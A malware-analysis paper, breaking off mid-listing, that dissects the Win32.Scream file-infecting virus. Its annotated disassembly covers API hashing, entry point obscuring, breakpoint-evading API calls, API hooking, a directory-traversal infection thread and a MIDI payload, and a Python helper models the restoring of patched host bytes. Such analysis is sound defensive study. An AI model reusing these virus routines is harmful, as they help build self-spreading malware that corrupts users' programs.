Analysis of Win32.Scream




1. Introduction

Scream is a very interesting virus as it combines a lot of techniques inside it. In this paper I'll cover all of its features and internals, dissecting it with a top-down approach for better analysis. Moreover, the virus appears to be undetected by all anti-virus scanners, so I'll refer to it by the name hard coded inside it (Win32.Scream). Most of the analysis was done with the help of a disassembler (IDA) and some other private tools.

2. Features

As I have mentioned before, the virus contains a lot of techniques I haven't seen in a virus before, and that's what makes it more interesting. Some of the features of the virus are:

API Hooking Engine
Stealth API Calls
Entry Point Obscuring (EPO)
Hard Coded Memory Access (HMA)
Instruction Length Engine (ILE)
Encryption/Decryption Engine (RDKE32)
Random Number Generation Engine (MT)

Those are just some of the interesting features of the virus; the list could go on, but for the moment I have listed only some of them.

3. Pre Analysis

A not so complex per-process resident, entry point obscuring (EPO) virus which infects PE files. At runtime it launches a thread that performs a directory traversal to infect files.

3.1. HMA

This engine removes the delta offset for good: it replaces every [mem32] operand with a new mem32 address. One has to calculate that address oneself and pass it to the engine. The engine changes all hard coded memory accesses except where an operand-size, address-size or FS segment prefix is used.

3.2. ILE

This engine calculates the length of an instruction. ESI is loaded with a pointer to the instruction whose size one wants to get.

3.3. RDKE32

The Random Decoding Key Engine (RDKE32) encrypts and decrypts the virus infection code with SHA-1.

3.4. RNGMT

This engine generates random numbers based on a matrix linear recurrence over a finite binary field. It provides fast generation of very high quality pseudorandom numbers, having been designed specifically to rectify many of the flaws found in older algorithms.

4. Analysis

CODE:0040468C  nop
CODE:0040468D  mov esi, offset _debug
CODE:00404692  mov esi, offset FRD_Imported_Kernel32_API_Names
CODE:00404697  mov edi, offset CRC32_Imported_Kernel32_API_Names
CODE:0040469C  call FRC_MakeCRC32Table
CODE:004046A1  mov esi, offset FRD_Imported_Imagehlp_API_Names
CODE:004046A6  mov edi, offset CRC32_Imported_Imagehlp_API_Names
CODE:004046AB  call FRC_MakeCRC32Table
CODE:004046B0  mov esi, offset FRD_Imported_Sfc_API_Names
CODE:004046B5  mov edi, offset CRC32_Imported_Sfc_API_Names
CODE:004046BA  call FRC_MakeCRC32Table
CODE:004046BF  mov esi, offset FRD_Imported_WinMM_API_Names
CODE:004046C4  mov edi, offset CRC32_Imported_WinMM_API_Names
CODE:004046C9  call FRC_MakeCRC32Table

CODE:004046CE  mov esi, offset FRD_Imported_Shell32_API_Names
CODE:004046D3  mov edi, offset CRC32_Imported_Shell32_API_Names
CODE:004046D8  call FRC_MakeCRC32Table
CODE:004046DD  mov esi, offset FRD_Hook_API_Names ; "CreateFileA"
CODE:004046E2  mov edi, offset API_Hook_Table

CODE:004046E7 @@HookAPICRC32Loop:
CODE:004046E7  mov al, [esi]
CODE:004046E9  test al, al
CODE:004046EB  jz short @@DoneAPIHookCRC32Loop
CODE:004046ED  call GetCRC32OfString
CODE:004046F2  mov [edi], ebx
CODE:004046F4  add edi, 0Ch
CODE:004046F7  jmp short @@HookAPICRC32Loop

CODE:004046F9 @@DoneAPIHookCRC32Loop:
CODE:004046F9  mov esi, offset FRD_File_Names
CODE:004046FE  mov edi, offset CRC32_KERNEL32_DLL
CODE:00404703  call FRC_MakeCRC32Table
CODE:00404708  push offset FRC_FakeHost
CODE:0040470D  mov ER_CallingOffset, offset FRC_FakeHost
CODE:00404717  mov ER_Code, 90909090h
CODE:00404721  mov ER_Code_0, 90h
CODE:00404728  jmp EntryPoint

Before the virus runs it needs to do some pre-work to set up its surroundings. First, it makes CRC32 checksums of some API names to use later. Then it sets up a fake EPO. After that it jumps to the real starting point of the virus.

CODE:00401000 EntryPoint:
CODE:00401000  pushf
CODE:00401001  pusha
CODE:00401002  cmp ThreadHandle, 0
CODE:00401009  jz short @@ThreadIsNotRunning
CODE:0040100B  mov ecx, 24h
CODE:00401010  call RestoreEPOBytes
CODE:00401015  popa
CODE:00401016  popf

CODE:00401017  retn

CODE:00401018 @@ThreadIsNotRunning:
CODE:00401018  call Initialize
CODE:0040101D  test eax, eax
CODE:0040101F  jz short @@RestoreEPO
CODE:00401021  lea ebx, sub_4010ba
CODE:00401027  mov [ebp+0c4h], ebx
CODE:0040102D  lea ebx, @@ExpSafeLocation
CODE:00401033  mov [ebp+0c8h], ebx
CODE:00401039  mov [ebp+0cch], esp
CODE:0040103F  lea ebx, [ebp+0c0h]
CODE:00401045  push ebx
CODE:00401046  xor ebx, ebx
CODE:00401048  push dword ptr fs:[ebx]
CODE:0040104B  pop dword ptr [ebp+0c0h]
CODE:00401051  pop dword ptr fs:[ebx]
CODE:00401054  push CRC32_KERNEL32_DLL
CODE:0040105A  call HookAPIs
CODE:0040105F  push CRC32_SHELL32_DLL
CODE:00401065  call HookAPIs
CODE:0040106A  push 0
CODE:0040106C  lea eax, MainThread
CODE:00401072  push esp
CODE:00401073  push 0
CODE:00401075  push 0
CODE:00401077  push eax
CODE:00401078  push 0
CODE:0040107A  push 0
CODE:0040107C  mov al, 1Ah
CODE:0040107E  call StealthAPI
CODE:00401083  mov ThreadHandle, eax
CODE:00401088  pop ebx
CODE:00401089  test eax, eax
CODE:0040108B  jz short @@RestoreEPO
CODE:0040108D  push 0FFFFFFFEh
CODE:0040108F  push eax
CODE:00401090  mov al, 1Ch
CODE:00401092  call StealthAPI
CODE:00401097  call UnInitialize

CODE:0040109C @@RestoreEPO:
CODE:0040109C  mov ecx, 1024h
CODE:004010A1  call RestoreEPOBytes

CODE:004010A6 @@ExpSafeLocation:
CODE:004010A6  xor ebx, ebx
CODE:004010A8  push dword ptr [ebp+0c0h]
CODE:004010AE  pop dword ptr fs:[ebx]
CODE:004010B1  add esp, 1000h
CODE:004010B7  popa
CODE:004010B8  popf
CODE:004010B9  retn

This is the real entry point of the virus. It saves the registers so that it does not ruin the host's execution. Then, if the thread is already running, it restores the EPO and returns to the host. If the thread is not running, it initializes the virus's environment so that it can work; this initialization routine will be discussed later. Also, if nothing went wrong during the execution, the virus restores the EPO and leaves the routine immediately. Note that the virus uses SEH throughout to avoid crashing under any circumstances. Afterwards, the virus hooks some APIs that the host might be using. Then it starts a thread that runs simultaneously with the host's code to perform a directory traversal search. Finally the virus cleans up after the changes it has made and returns to the host.

CODE:004010E1 Initialize proc near
CODE:004010E1
CODE:004010E1 arg_0               = dword ptr 4
CODE:004010E1 SFC_BaseAddress     = dword ptr 8
CODE:004010E1 WINMM_BaseAddress   = dword ptr 0Ch
CODE:004010E1 SHELL32_BaseAddress = dword ptr 10h
CODE:004010E1 arg_14              = dword ptr 18h
CODE:004010E1 arg_8c              = dword ptr 90h
CODE:004010E1 API_SFC_IN_MSTRUC   = dword ptr 9Ch
CODE:004010E1 API_WINMM_IN_MSTRUC = dword ptr 0A0h
CODE:004010E1 arg_b8              = dword ptr 0BCh
CODE:004010E1 arg_cc              = dword ptr 0D0h
CODE:004010E1 arg_d0              = dword ptr 0D4h
CODE:004010E1 arg_d4              = dword ptr 0D8h
CODE:004010E1 arg_d8              = dword ptr 0DCh
CODE:004010E1 arg_1020            = dword ptr 1024h
CODE:004010E1
CODE:004010E1  cmp InitializeState, 0
CODE:004010E8  jnz short Initialize
CODE:004010EA  or InitializeState, 0FFFFFFFFh
CODE:004010F1  pop ebx
CODE:004010F2  mov ecx, 1000h
CODE:004010F7  sub esp, ecx
CODE:004010F9  mov ebp, esp
CODE:004010FB  mov PointerToMSTRUC, ebp
CODE:00401101  cld
CODE:00401102  xor eax, eax
CODE:00401104  mov edi, esp
CODE:00401106  rep stosb
CODE:00401108  push ebx
CODE:00401109  lea ebx, sub_401269

CODE:0040110F  mov [ebp+arg_d0], ebx
CODE:00401115  lea ebx, @@ExpSafeLocation
CODE:0040111B  mov [ebp+arg_d4], ebx
CODE:00401121  mov [ebp+arg_d8], esp
CODE:00401127  lea ebx, [ebp+arg_cc]
CODE:0040112D  push ebx
CODE:0040112E  xor ebx, ebx
CODE:00401130  push dword ptr fs:[ebx]
CODE:00401133  pop [ebp+arg_cc]
CODE:00401139  pop dword ptr fs:[ebx]
CODE:0040113C  mov eax, [esp+arg_1020]
CODE:00401143  rdtsc
CODE:00401145  xchg eax, ebx
CODE:00401146  xchg eax, edx
CODE:00401147  mov ecx, 10h
CODE:0040114C  div ecx
CODE:0040114E  lea edi, Init_Key_Start
CODE:00401154  xor [edi+edx*4], ebx
CODE:00401157  push 10h
CODE:00401159  push edi
CODE:0040115A  call init_by_array
CODE:0040115F  call GetKernel32Base
CODE:00401164  lea eax, [ebp+arg_14]
CODE:00401167  lea ebx, CRC32_Imported_Kernel32_API_Names
CODE:0040116D  push dword ptr [ebp+0]
CODE:00401170  push 1Eh
CODE:00401172  push eax
CODE:00401173  push ebx
CODE:00401174  call GetAPIsFromCRC32List
CODE:00401179  test eax, eax
CODE:0040117B  jz @@ExpSafeLocation
CODE:00401181  lea esi, NAME_IMAGEHLP_DLL
CODE:00401187  push esi
CODE:00401188  mov al, 3
CODE:0040118A  call StealthAPI
CODE:0040118F  test eax, eax
CODE:00401191  jz @@ExpSafeLocation
CODE:00401197  mov [ebp+arg_0], eax
CODE:0040119A  lea edx, [ebp+arg_8c]
CODE:004011A0  lea ebx, CRC32_Imported_Imagehlp_API_Names
CODE:004011A6  push eax
CODE:004011A7  push 3
CODE:004011A9  push edx
CODE:004011AA  push ebx
CODE:004011AB  call GetAPIsFromCRC32List
CODE:004011B0  test eax, eax
CODE:004011B2  jz @@ExpSafeLocation
CODE:004011B8  or SFC_enabled, 0FFFFFFFFh
CODE:004011BF  lea esi, NAME_SFC_DLL

CODE:004011C5  push esi
CODE:004011C6  mov al, 3
CODE:004011C8  call StealthAPI
CODE:004011CD  test eax, eax
CODE:004011CF  jz short @@NoSFC
CODE:004011D1  mov [ebp+SFC_BaseAddress], eax
CODE:004011D4  lea edx, [ebp+API_SFC_IN_MSTRUC]
CODE:004011DA  lea ebx, CRC32_Imported_Sfc_API_Names
CODE:004011E0  push eax
CODE:004011E1  push 1
CODE:004011E3  push edx
CODE:004011E4  push ebx
CODE:004011E5  call GetAPIsFromCRC32List
CODE:004011EA  test eax, eax
CODE:004011EC  jz short @@NoSFC
CODE:004011EE  and SFC_enabled, 0

CODE:004011F5 @@NoSFC:
CODE:004011F5  lea esi, NAME_WINMM_DLL
CODE:004011FB  push esi
CODE:004011FC  mov al, 3
CODE:004011FE  call StealthAPI
CODE:00401203  test eax, eax
CODE:00401205  jz short @@ExpSafeLocation
CODE:00401207  mov [ebp+WINMM_BaseAddress], eax
CODE:0040120A  lea edx, [ebp+API_WINMM_IN_MSTRUC]
CODE:00401210  lea ebx, CRC32_Imported_WinMM_API_Names
CODE:00401216  push eax
CODE:00401217  push 7
CODE:00401219  push edx
CODE:0040121A  push ebx
CODE:0040121B  call GetAPIsFromCRC32List
CODE:00401220  test eax, eax
CODE:00401222  jz short @@ExpSafeLocation
CODE:00401224  lea esi, NAME_SHELL32_DLL
CODE:0040122A  push esi
CODE:0040122B  mov al, 3
CODE:0040122D  call StealthAPI
CODE:00401232  test eax, eax
CODE:00401234  jz short @@ExpSafeLocation
CODE:00401236  mov [ebp+SHELL32_BaseAddress], eax
CODE:00401239  lea edx, [ebp+arg_b8]
CODE:0040123F  lea ebx, CRC32_Imported_Shell32_API_Names
CODE:00401245  push eax
CODE:00401246  push 1

CODE:00401248  push edx
CODE:00401249  push ebx
CODE:0040124A  call GetAPIsFromCRC32List
CODE:0040124F  test eax, eax
CODE:00401251  jz short @@ExpSafeLocation
CODE:00401253  stc
CODE:00401254  sbb eax, eax

CODE:00401256 @@ExpSafeLocation:
CODE:00401256  xor ebx, ebx
CODE:00401258  push [ebp+arg_cc]
CODE:0040125E  pop dword ptr fs:[ebx]
CODE:00401261  and InitializeState, 0
CODE:00401268  retn
CODE:00401268 Initialize endp

In the previous block the virus initializes its surroundings so that it can work correctly. In brief, it allocates memory (the work area on the stack that the rest of the code addresses through EBP), seeds the random number generator, and retrieves the library base addresses and the API addresses it needs from its CRC32 lists.

CODE:00401290 UnInitialize proc near
CODE:00401290  push eax
CODE:00401291  push dword ptr [ebp+4]
CODE:00401294  mov al, 4
CODE:00401296  call StealthAPI
CODE:0040129B  push dword ptr [ebp+8]
CODE:0040129E  mov al, 4
CODE:004012A0  call StealthAPI
CODE:004012A5  push dword ptr [ebp+0ch]
CODE:004012A8  mov al, 4
CODE:004012AA  call StealthAPI
CODE:004012AF  push dword ptr [ebp+10h]
CODE:004012B2  mov al, 4
CODE:004012B4  call StealthAPI
CODE:004012B9  pop eax
CODE:004012BA  retn
CODE:004012BA UnInitialize endp

The previous code block frees the libraries that the virus has been using throughout the code and then returns.

CODE:004012BB RestoreEPOBytes proc near

CODE:004012BB arg_0 = dword ptr 4
CODE:004012BB
CODE:004012BB  mov ebx, [esp+ecx+arg_0]
CODE:004012BF  lea edi, [ebx-5]
CODE:004012C2  mov [esp+ecx+arg_0], edi
CODE:004012C6  mov ecx, 10h
CODE:004012CB  lea esi, ER_CallingOffset

CODE:004012D1 @@FindCallerCode:
CODE:004012D1  lodsd
CODE:004012D2  cmp eax, ebx
CODE:004012D4  jz short @@Patch
CODE:004012D6  add esi, 5
CODE:004012D9  loop @@FindCallerCode

CODE:004012DB @@Patch:
CODE:004012DB  movsb
CODE:004012DC  movsd
CODE:004012DD  retn
CODE:004012DD RestoreEPOBytes endp

The previous code block gets the return address from the stack. Since this address points just after the call into the virus, it is adjusted to point to the start of the EPO code, and the adjusted address is written back to the stack. After that the routine restores the EPO that called it, searching through the data area for the record of the call site that entered the virus.

CODE:004012DE MainThread proc near
CODE:004012DE
CODE:004012DE var_38   = dword ptr -38h
CODE:004012DE arg_10e4 = dword ptr 10E8h
CODE:004012DE
CODE:004012DE  pushf
CODE:004012DF  pusha
CODE:004012E0  mov eax, PointerToMSTRUC
CODE:004012E5  mov ThreadPointerToMSTRUC, eax
CODE:004012EA  call Initialize
CODE:004012EF  mov ebx, PointerToMSTRUC
CODE:004012F5  xchg ebx, ThreadPointerToMSTRUC
CODE:004012FB  mov PointerToMSTRUC, ebx
CODE:00401301  test eax, eax
CODE:00401303  jnz short @@InitializationOK
CODE:00401305  popa
CODE:00401306  popf
CODE:00401307  retn
CODE:00401308 ; ---------------------------------------------------------------------------

CODE:00401308 @@InitializationOK:
CODE:00401308  lea ebx, sub_4013fb
CODE:0040130E  mov [ebp+114h], ebx
CODE:00401314  lea ebx, @@ExpSafeLocation
CODE:0040131A  mov [ebp+118h], ebx
CODE:00401320  mov [ebp+11ch], esp
CODE:00401326  lea ebx, [ebp+110h]
CODE:0040132C  push ebx
CODE:0040132D  xor ebx, ebx
CODE:0040132F  push dword ptr fs:[ebx]
CODE:00401332  pop dword ptr [ebp+110h]
CODE:00401338  pop dword ptr fs:[ebx]
CODE:0040133B  lea esi, word_403f16
CODE:00401341  lea edi, InfectFile

CODE:00401347 _debug:
CODE:00401347  nop
CODE:00401348  push 698h
CODE:0040134D  push edi
CODE:0040134E  push esi
CODE:0040134F  call RDKE32Decrypt
CODE:00401354  cmp ThreadExecution, 0FFFFFFFFh
CODE:0040135B  jz short @@ExpSafeLocation
CODE:0040135D  or Infect_Encrypted, 0FFFFFFFFh
CODE:00401364  mov ecx, 104h
CODE:00401369  sub esp, ecx
CODE:0040136B  push esp
CODE:0040136C  push ecx
CODE:0040136D  mov al, 0Dh
CODE:0040136F  call StealthAPI
CODE:00401374  test eax, eax
CODE:00401376  jz short @@ExpSafeLocation
CODE:00401378  push 5C3A43h

CODE:0040137D @@NextDrive:
CODE:0040137D  mov eax, 10h
CODE:00401382  call RandomNumber
CODE:00401387  inc eax
CODE:00401388  mov [ebp+27ch], eax
CODE:0040138E  push esp
CODE:0040138F  mov al, 10h
CODE:00401391  call StealthAPI
CODE:00401396  cmp al, 2
CODE:00401398  jz short @@DriveIsOK
CODE:0040139A  cmp al, 3
CODE:0040139C  jz short @@DriveIsOK
CODE:0040139E  cmp al, 4

CODE:004013A0  jnz short @@TryNextDrive

CODE:004013A2 @@DriveIsOK:
CODE:004013A2  push esp
CODE:004013A3  mov al, 0Ch
CODE:004013A5  call StealthAPI
CODE:004013AA  call DirectoryTraversal
CODE:004013AF  cmp ThreadExecution, 0FFFFFFFFh
CODE:004013B6  jz short @@RestoreCurrentDirectory

CODE:004013B8 @@TryNextDrive:
CODE:004013B8  cmp [esp+38h+var_38], '\:Z'
CODE:004013BF  jz short @@RestoreCurrentDirectory
CODE:004013C1  inc [esp+38h+var_38]
CODE:004013C4  jmp short @@NextDrive

CODE:004013C6 @@RestoreCurrentDirectory:
CODE:004013C6  pop edx
CODE:004013C7  push esp
CODE:004013C8  mov al, 0Ch
CODE:004013CA  call StealthAPI
CODE:004013CF  add esp, 104h

CODE:004013D5 @@ExpSafeLocation:
CODE:004013D5  call UnInitialize
CODE:004013DA  xor ebx, ebx
CODE:004013DC  push dword ptr [ebp+110h]
CODE:004013E2  pop dword ptr fs:[ebx]
CODE:004013E5  mov eax, [ebp+7ch]
CODE:004013E8  mov [esp-0cch+arg_10e4], eax
CODE:004013EF  add esp, 1000h
CODE:004013F5  popa
CODE:004013F6  popf
CODE:004013F7  push 0
CODE:004013F9  call eax
CODE:004013F9 MainThread endp

The previous code block, in brief, allocates memory for the virus, retrieves API addresses, decrypts the infection code and does a directory traversal search, drive by drive from C: up to Z:.
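As an added example (not code from the paper or from the virus), the following Python models the EPO record table and the RestoreEPOBytes logic listed above, so that the host's original bytes can be recovered from an infected image. The 9-byte record layout (the return address of the patched call followed by the five saved bytes) is inferred from ER_CallingOffset / ER_Code / ER_Code_0 and from the lodsd / add esi, 5 / movsb+movsd sequence; the image base, the host bytes and the return address are constructed for the demonstration.

```python
"""Added example: the EPO record table and RestoreEPOBytes logic modelled in
Python so the host's original bytes can be recovered from an infected image.
Not code from the paper or the virus. Assumed record layout (inferred from
ER_CallingOffset / ER_Code / ER_Code_0 and from lodsd / add esi, 5 /
movsb+movsd): 16 records of 9 bytes, a little-endian dword with the return
address of the patched call followed by the 5 original host bytes."""
import struct
from typing import List, Optional, Tuple

RECORD_COUNT = 0x10     # mov ecx, 10h before @@FindCallerCode
PATCH_LEN = 5           # lea edi, [ebx-5]; movsb + movsd restore 5 bytes
RECORD_SIZE = 4 + PATCH_LEN


def parse_epo_records(table: bytes) -> List[Tuple[int, bytes]]:
    """Split the record table into (return_address, saved_bytes) pairs."""
    records = []
    for i in range(RECORD_COUNT):
        off = i * RECORD_SIZE
        (ret_addr,) = struct.unpack_from("<I", table, off)
        records.append((ret_addr, bytes(table[off + 4:off + RECORD_SIZE])))
    return records


def restore_epo_bytes(image: bytearray, image_base: int, table: bytes,
                      return_address: int) -> Optional[int]:
    """Mirror of RestoreEPOBytes: locate the record whose stored address equals
    the return address found on the stack, write the saved 5 bytes back over
    the call the virus planted at return_address - 5, and return that address
    (the value the virus writes back to the stack so that retn re-executes the
    original host instructions). Returns None when no record matches; the
    listed loop instead falls through into @@Patch after 16 misses."""
    call_site = return_address - PATCH_LEN
    for ret_addr, saved in parse_epo_records(table):
        if ret_addr != return_address:
            continue
        off = call_site - image_base
        if off < 0 or off + PATCH_LEN > len(image):
            return None             # record points outside the image
        image[off:off + PATCH_LEN] = saved
        return call_site
    return None


# Constructed sample: a tiny "host" function whose first 5 bytes after the
# prologue were replaced by a 5-byte call (E8 rel32) into the virus body.
SAMPLE_IMAGE_BASE = 0x400000
SAMPLE_ORIGINAL_BYTES = bytes.fromhex("8b45 0833 c0")   # mov eax,[ebp+8]; xor eax,eax
SAMPLE_RETURN_ADDRESS = SAMPLE_IMAGE_BASE + 3 + PATCH_LEN


def build_sample() -> Tuple[bytearray, bytes]:
    """Return (infected image, EPO record table) for the constructed host."""
    image = bytearray(bytes.fromhex("55 8bec")          # push ebp; mov ebp,esp
                      + bytes.fromhex("e8 00100000")    # planted call (constructed rel32)
                      + bytes.fromhex("5dc3"))          # pop ebp; ret
    record = struct.pack("<I", SAMPLE_RETURN_ADDRESS) + SAMPLE_ORIGINAL_BYTES
    table = record + bytes(RECORD_SIZE * (RECORD_COUNT - 1))   # unused slots
    return image, table


if __name__ == "__main__":
    img, tbl = build_sample()
    new_ret = restore_epo_bytes(img, SAMPLE_IMAGE_BASE, tbl, SAMPLE_RETURN_ADDRESS)
    print(hex(new_ret), img.hex())
```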

CODE:00401422 PayloadThread proc near
CODE:00401422
CODE:00401422 arg_ff4 = dword ptr 0FF8h
CODE:00401422
CODE:00401422  pushf
CODE:00401423  pusha
CODE:00401424  mov eax, PointerToMSTRUC
CODE:00401429  mov Thread2PointerToMSTRUC, eax
CODE:0040142E  call Initialize
CODE:00401433  mov ebx, PointerToMSTRUC
CODE:00401439  xchg ebx, Thread2PointerToMSTRUC
CODE:0040143F  mov PointerToMSTRUC, ebx
CODE:00401445  test eax, eax
CODE:00401447  jnz short @@InitializationOk
CODE:00401449  popa
CODE:0040144A  popf
CODE:0040144B  retn

CODE:0040144C @@InitializationOk:
CODE:0040144C  lea ebx, sub_4014b1
CODE:00401452  mov [ebp+124h], ebx
CODE:00401458  lea ebx, @@ExpSafeLocation
CODE:0040145E  mov [ebp+128h], ebx
CODE:00401464  mov [ebp+12ch], esp
CODE:0040146A  lea ebx, [ebp+120h]
CODE:00401470  push ebx
CODE:00401471  xor ebx, ebx
CODE:00401473  push dword ptr fs:[ebx]
CODE:00401476  pop dword ptr [ebp+120h]
CODE:0040147C  pop dword ptr fs:[ebx]
CODE:0040147F  lea eax, Payload_Song
CODE:00401485  push eax
CODE:00401486  call PlayMidiSong

CODE:0040148B @@ExpSafeLocation:
CODE:0040148B  call UnInitialize
CODE:00401490  xor ebx, ebx
CODE:00401492  push dword ptr [ebp+120h]
CODE:00401498  pop dword ptr fs:[ebx]
CODE:0040149B  mov eax, [ebp+7ch]
CODE:0040149E  mov [esp+24h+arg_ff4], eax
CODE:004014A5  add esp, 1000h
CODE:004014AB  popa
CODE:004014AC  popf
CODE:004014AD  push 0
CODE:004014AF  call eax
CODE:004014AF PayloadThread endp

The previous code block plays a small MIDI tune as the payload of the virus.

CODE:004014D8 StealthAPI proc near
CODE:004014D8
CODE:004014D8 var_24 = dword ptr -24h
CODE:004014D8
CODE:004014D8  movzx eax, al
CODE:004014DB  mov eax, [ebp+eax*4+18h]
CODE:004014DF  pusha
CODE:004014E0  push 0Ah
CODE:004014E2  xchg eax, esi

CODE:004014E3 @@CheckNextInstruction:
CODE:004014E3  cmp byte ptr [esi], 0CCh
CODE:004014E6  jz short @@BadOpcode
CODE:004014E8  cmp word ptr [esi], 0CD03h
CODE:004014ED  jz short @@BadOpcode
CODE:004014EF  call ILE
CODE:004014F4  add esi, ecx
CODE:004014F6  jecxz short @@JumpToAPI
CODE:004014F8  dec [esp+24h+var_24]
CODE:004014FB  jnz short @@CheckNextInstruction

CODE:004014FD @@JumpToAPI:
CODE:004014FD  pop eax
CODE:004014FE  popa
CODE:004014FF  jmp eax

CODE:00401501 @@BadOpcode:
CODE:00401501  pop eax
CODE:00401502  popa
CODE:00401503  retn
CODE:00401503 StealthAPI endp

The previous code block contains the StealthAPI function, one of the most important functions in this virus: it takes an API index in AL, looks the address up in the work area, and before jumping to the API it scans its first instructions for breakpoints (the 0CCh and CD 03h int 3 opcodes). If one is found the API is not called at all.

CODE:00401504 PlayMidiSong proc near
CODE:00401504
CODE:00401504 var_38  = dword ptr -38h
CODE:00401504 arg_164 = dword ptr 168h
CODE:00401504
CODE:00401504  pusha
CODE:00401505  mov ecx, 178h

CODE:0040150A  sub esp, ecx
CODE:0040150C  mov edi, esp
CODE:0040150E  xor eax, eax
CODE:00401510  rep stosb
CODE:00401512  mov edi, esp
CODE:00401514  lea eax, [edi]
CODE:00401516  push 0
CODE:00401518  push 0
CODE:0040151A  push 0
CODE:0040151C  push 0FFFFFFFFh
CODE:0040151E  push eax
CODE:0040151F  mov al, 27h
CODE:00401521  call StealthAPI
CODE:00401526  test eax, eax
CODE:00401528  jnz @@Error
CODE:0040152E  mov esi, [esp+34h+arg_164]
CODE:00401535  lodsd
CODE:00401536  xchg eax, ecx
CODE:00401537  imul edx, ecx, 10h
CODE:0040153A  add edx, esi
CODE:0040153C  xor ebx, ebx

CODE:0040153E @@ProcessDataStreamInformation:
CODE:0040153E  lodsd
CODE:0040153F  mov [edi+ebx+10h], eax
CODE:00401543  push eax
CODE:00401544  lodsd
CODE:00401545  xchg eax, [esp+38h+var_38]
CODE:00401548  push eax
CODE:00401549  add eax, 0B0h
CODE:0040154E  push 0
CODE:00401550  push 0
CODE:00401552  push eax
CODE:00401553  call SendData
CODE:00401558  pop eax
CODE:00401559  add eax, 0C0h
CODE:0040155E  push 0
CODE:00401560  push [esp+3ch+var_38]
CODE:00401564  push eax
CODE:00401565  call SendData
CODE:0040156A  pop eax
CODE:0040156B  lodsd
CODE:0040156C  mov [edi+ebx+14h], eax
CODE:00401570  lodsd
CODE:00401571  mov [edi+ebx+18h], eax
CODE:00401575  mov [edi+ebx+1ch], edx
CODE:00401579  add edx, eax
CODE:0040157B  add ebx, 18h
CODE:0040157E  loop @@ProcessDataStreamInformation
CODE:00401580  and dword ptr [edi+0ch], 0

CODE:00401584 @@PlaySong:
CODE:00401584  and dword ptr [edi+8], 0
CODE:00401588  mov ecx, 0Fh
CODE:0040158D  xor ebx, ebx

CODE:0040158F @@UpdateLoop:
CODE:0040158F  mov esi, [edi+ebx+1ch]
CODE:00401593  mov edx, [edi+ebx+10h]
CODE:00401597  add edx, 90h
CODE:0040159D  mov eax, [edi+ebx+18h]
CODE:004015A1  add eax, [edi+ebx+20h]
CODE:004015A5  test eax, eax
CODE:004015A7  jz short @@NextTrack
CODE:004015A9  or dword ptr [edi+8], 0FFFFFFFFh
CODE:004015AD  cmp dword ptr [edi+0ch], 0
CODE:004015B1  jz short @@LoadNewNotes
CODE:004015B3  dec dword ptr [edi+ebx+20h]
CODE:004015B7  jnz short @@NextTrack
CODE:004015B9  cmp byte ptr [edi+ebx+24h], 80h
CODE:004015BE  jz short @@LoadNewNotes
CODE:004015C0  sub esi, 5
CODE:004015C3  push ecx
CODE:004015C4  mov ecx, 5
CODE:004015C9  xor eax, eax

CODE:004015CB @@StopNoteLoop:
CODE:004015CB  push 0
CODE:004015CD  lodsb
CODE:004015CE  push eax
CODE:004015CF  push edx
CODE:004015D0  call SendData
CODE:004015D5  loop @@StopNoteLoop
CODE:004015D7  pop ecx

CODE:004015D8 @@LoadNewNotes:
CODE:004015D8  mov eax, [edi+ebx+18h]
CODE:004015DC  test eax, eax
CODE:004015DE  jz short @@NextTrack
CODE:004015E0  lodsb
CODE:004015E1  dec dword ptr [edi+ebx+18h]
CODE:004015E5  mov ah, al
CODE:004015E7  and ah, 80h
CODE:004015EA  mov [edi+ebx+24h], ah
CODE:004015EE  and al, 7Fh
CODE:004015F0  mov [edi+ebx+20h], al

CODE:004015F4  test ah, ah
CODE:004015F6  jnz short @@IsRest
CODE:004015F8  push ecx
CODE:004015F9  mov ecx, 5
CODE:004015FE  sub [edi+ebx+18h], ecx
CODE:00401602  xor eax, eax

CODE:00401604 @@PlayNoteLoop:
CODE:00401604  push dword ptr [edi+ebx+14h]
CODE:00401608  lodsb
CODE:00401609  push eax
CODE:0040160A  push edx
CODE:0040160B  call SendData
CODE:00401610  loop @@PlayNoteLoop
CODE:00401612  pop ecx

CODE:00401613 @@IsRest:
CODE:00401613  mov [edi+ebx+1ch], esi

CODE:00401617 @@NextTrack:
CODE:00401617  add ebx, 18h
CODE:0040161A  dec ecx
CODE:0040161B  jnz @@UpdateLoop
CODE:00401621  or dword ptr [edi+0ch], 0FFFFFFFFh
CODE:00401625  push 50h
CODE:00401627  mov al, 1
CODE:00401629  call StealthAPI
CODE:0040162E  cmp dword ptr [edi+8], 0
CODE:00401632  jnz @@PlaySong
CODE:00401638  push dword ptr [edi]
CODE:0040163A  mov al, 24h
CODE:0040163C  call StealthAPI

CODE:00401641 @@Error:
CODE:00401641  add esp, 178h
CODE:00401647  popa
CODE:00401648  retn 4
CODE:00401648 PlayMidiSong endp

The previous code block plays an embedded MIDI song that is hard coded in the virus as notes.

CODE:0040164B SendData proc near

CODE:0040164B
CODE:0040164B ARG1 = dword ptr 4
CODE:0040164B ARG2 = dword ptr 8
CODE:0040164B ARG3 = dword ptr 0Ch
CODE:0040164B
CODE:0040164B  pusha
CODE:0040164C  mov eax, [esp+20h+ARG3]
CODE:00401650  shl eax, 10h
CODE:00401653  mov ebx, [esp+20h+ARG2]
CODE:00401657  shl ebx, 8
CODE:0040165A  add eax, ebx
CODE:0040165C  add eax, [esp+20h+ARG1]
CODE:00401660  push eax
CODE:00401661  push dword ptr [edi]
CODE:00401663  mov al, 28h
CODE:00401665  call StealthAPI
CODE:0040166A  test eax, eax
CODE:0040166C  popa
CODE:0040166D  retn 0Ch
CODE:0040166D SendData endp

The previous code block packs its three arguments into one MIDI message and sends it to the MIDI output device.

CODE:00401670 HookAPIs proc near
CODE:00401670  pusha
CODE:00401671  push 0
CODE:00401673  mov al, 2
CODE:00401675  call StealthAPI
CODE:0040167A  xchg eax, ebx
CODE:0040167B  mov esi, [ebx+3ch]
CODE:0040167E  mov esi, [ebx+esi+80h]
CODE:00401685  add esi, ebx

CODE:00401687 @@FindLibrary:
CODE:00401687  cmp dword ptr [esi], 0
CODE:0040168A  jz short @@NoMoreHooks
CODE:0040168C  push esi
CODE:0040168D  mov esi, [esi+0ch]
CODE:00401690  add esi, ebx
CODE:00401692  push ebx
CODE:00401693  call Uppercase
CODE:00401698  call GetCRC32OfString
CODE:0040169D  cmp [esp+2ch], ebx
CODE:004016A1  jz short @@FoundLibrary
CODE:004016A3  pop ebx
CODE:004016A4  pop esi

CODE:004016A5 add esi, 14h
CODE:004016A8 jmp short @@FindLibrary
CODE:004016AA ; ---------------------------------------------------------------------------
CODE:004016AA @@FoundLibrary:
CODE:004016AA pop ebx
